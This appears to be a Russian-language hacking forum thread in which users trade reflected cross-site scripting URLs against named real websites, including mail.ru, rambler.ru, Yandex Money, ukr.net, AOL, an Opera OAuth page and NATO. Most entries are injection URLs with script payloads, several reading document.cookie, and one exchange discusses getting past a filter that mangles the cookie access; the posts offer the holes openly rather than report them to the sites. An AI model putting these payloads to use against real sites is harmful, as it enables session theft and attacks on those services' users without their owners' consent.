http://rabota.mail.ru Code: http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba=' crackmail: не пашет. пффф, уже пофиксили
money.yandex.ru https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//--></script><ScRiPt>alert(document.cookie)</ScRiPt>
rambler.ru Вроде ещё не выкладывали. PHP: http://horoscopes.rambler.ru/names.html?words="><script>alert('XSS')</script> PHP: http://dating.meta.ua/search.php?action=search&min_age="><script>alert(/XSS/)</script> PHP: http://index.online.ua/?cx=&q="><script>alert('XSS')</script> ukr.net Не знаю выкладывали или нет, гугл не ответил точно. PHP: http://freemail.ukr.net/q/reg?name="><script>alert('XSS')</script> PHP: http://kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
mail.ru Парочка пассивных xss на форумах mail.ru PHP: http://forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=<script type="text/javascript"><script>alert("xss")</script> PHP: http://forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Пасcивка на mail.ru PHP: http://starlook.lady.mail.ru/commented?"><script>alert('XSS')</script> Вот только в alert(document.cookie) точка заменяется на _ Это можно как-нибудь обойти?
так будет лучше. HTML: http://starlook.lady.mail.ru/commented?period=month"><script>alert(document.cookie)</script> Зря выложил ее, завтра уже будет закрыта.
HTML: http://help.aol.com/help/microsites/searchEntry.do?&searchString="><script>alert(document.cookie)</script>
Code: http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJyTf9X"><script>alert(document.cookie)</script>
хотья это не почтовик, но думаю модеры простят меня http://www.nato.int/cps/en/natolive/search.htm "><script>alert('ololo')</script> PR-9 тИЦ- 1100
Code: http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru уязвимо поле - Задайте местоположение по умолчанию <marquee><h1>поймай меня</h1></marquee>
снова lady.mail.ru , такой тут еще не было вроде Code: http://lady.mail.ru/product/?letter=1<script>alert(123)</script>
kids.rambler.ru Code: http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1<script>alert('~d0s~')</script>
tv.ukr.net Code: http://tv.ukr.net/?scn=tv&sb=1'><script>alert(1)</script> Там почти весь сайт,видимо хсс они за багу не считают
rabota.ngs.ru Code: http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1"><script>alert(1)</script>
autorambler.ru Code: http://autorambler.ru/bz/pdd/pddonline/?type=1//--></script><script>alert(123)</script>
realty.mail.ru Code: http://realty.mail.ru/detail/001667605.html Добавляем в куки имя search_res а значение ставим "><script>alert(123)</script> Обновляем страничку,любуемся аллертом
В поле "Электронная почта" "><script>alert(document.cookie)</script> PHP: http://avito.ru.msn.com/additem HTML: http://avito.ru.msn.com/shops?name="'><script>alert(document.cookie)</script>
ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую.... P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата
cards.rambler.ru Code: http://cards.rambler.ru/author.html?author=d0s&offset=1"><script>alert('true')</script>